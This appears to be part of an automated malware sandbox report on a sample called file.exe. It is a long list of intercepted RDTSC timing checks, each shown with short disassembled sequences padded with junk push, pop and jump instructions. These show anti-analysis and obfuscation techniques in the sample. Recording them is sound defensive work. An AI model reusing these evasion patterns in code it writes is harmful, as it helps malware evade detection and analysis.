                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E47A second address: 62E49C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 ja 00007F6C544CAC26h 0x0000000b pop ebx 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C544CAC2Fh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E577 second address: 62E57D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E782 second address: 62E794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnc 00007F6C544CAC26h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E794 second address: 62E7CD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C54B5855Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F6C54B5854Fh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E8B4 second address: 62E8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F6C544CAC28h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E8CC second address: 62E8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EDBE second address: 62EDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EDC3 second address: 62EDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62EDC9 second address: 62EDE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F6C544CAC28h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1E0 second address: 62F1F0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1F0 second address: 62F1F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F34F second address: 62F353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F353 second address: 62F36E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665883 second address: 66589F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66589F second address: 6658A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665A1D second address: 665A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665A22 second address: 665A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665B86 second address: 665B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665B8A second address: 665B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665CDE second address: 665CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665CE2 second address: 665D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC35h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 665E6B second address: 665E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA29 second address: 66BA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA31 second address: 66BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA37 second address: 66BA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA3C second address: 66BA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F6C54B58546h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA49 second address: 66BA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F6C544CAC2Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F6C544CAC56h 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6C544CAC36h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA84 second address: 66BA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BA88 second address: 66BA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6CB second address: 66A6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6C54B58546h 0x0000000a jmp 00007F6C54B58550h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A6E5 second address: 66A738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6C544CAC2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F6C544CAC45h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F6C544CAC53h 0x00000019 pushad 0x0000001a jg 00007F6C544CAC26h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 jl 00007F6C544CAC26h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADB5 second address: 66ADD4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C54B58548h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6C54B58552h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADD4 second address: 66ADDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADDA second address: 66ADF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58554h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ADF9 second address: 66AE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C544CAC26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE05 second address: 66AE29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6C54B5854Fh 0x0000000c jmp 00007F6C54B5854Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE29 second address: 66AE4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 jno 00007F6C544CAC26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE4C second address: 66AE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE52 second address: 66AE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC34h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AE6F second address: 66AE73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B162 second address: 66B183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007F6C544CAC26h 0x0000000c popad 0x0000000d jmp 00007F6C544CAC34h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B183 second address: 66B19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58554h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ED02 second address: 66ED1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC33h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66ED1B second address: 66ED20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671C58 second address: 671C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671C61 second address: 671C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58551h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717EA second address: 6717F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6717F0 second address: 6717FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C54B58546h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 673491 second address: 67349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67349C second address: 6734A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734A0 second address: 6734BB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C544CAC26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6C544CAC2Bh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734BB second address: 6734C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6734C1 second address: 6734EA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C544CAC3Fh 0x00000008 jnp 00007F6C544CAC2Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3546 second address: 5E355B instructions: 0x00000000 rdtsc 0x00000002 js 00007F6C54B58546h 0x00000008 jnc 00007F6C54B58546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E355B second address: 5E3561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3561 second address: 5E35B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C54B58546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push esi 0x0000000d push ecx 0x0000000e jmp 00007F6C54B58554h 0x00000013 jmp 00007F6C54B58557h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6C54B58555h 0x00000020 jnl 00007F6C54B58546h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67794D second address: 67796E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6C544CAC37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67796E second address: 677972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67728A second address: 67728E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67728E second address: 677294 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677294 second address: 6772A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6C544CAC2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6773EE second address: 6773F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677534 second address: 677547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677547 second address: 677550 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677550 second address: 677556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 677695 second address: 67769B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67769B second address: 6776AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6C544CAC26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776AB second address: 6776AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776AF second address: 6776B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6776B5 second address: 6776BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B77A second address: 67B784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AE41 second address: 67AE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B58558h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AFB6 second address: 67AFC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B13C second address: 67B142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B142 second address: 67B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B45C second address: 67B462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B462 second address: 67B488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC33h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jns 00007F6C544CAC2Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B488 second address: 67B4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F6C54B58546h 0x00000009 jmp 00007F6C54B58555h 0x0000000e jmp 00007F6C54B58553h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push ecx 0x00000017 jng 00007F6C54B5855Ch 0x0000001d jmp 00007F6C54B58556h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67B4DF second address: 67B4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9A1 second address: 67E9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9A5 second address: 67E9B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6C544CAC26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9B5 second address: 67E9E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Dh 0x00000007 jmp 00007F6C54B58557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9E3 second address: 67E9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E9FF second address: 67EA0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6C54B5854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECA4 second address: 67ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECAA second address: 67ECAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECAE second address: 67ECC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67ECC9 second address: 67ECCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F0FA second address: 67F120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC37h 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F120 second address: 67F126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F126 second address: 67F12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F12A second address: 67F12E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F12E second address: 67F15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6C544CAC32h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C544CAC2Ah 0x00000016 jo 00007F6C544CAC26h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F15B second address: 67F179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F179 second address: 67F183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F183 second address: 67F189 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67F306 second address: 67F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6C544CAC26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D23 second address: 685D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58557h 0x00000007 jmp 00007F6C54B58557h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F6C54B58560h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F6C54B58558h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685D79 second address: 685D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
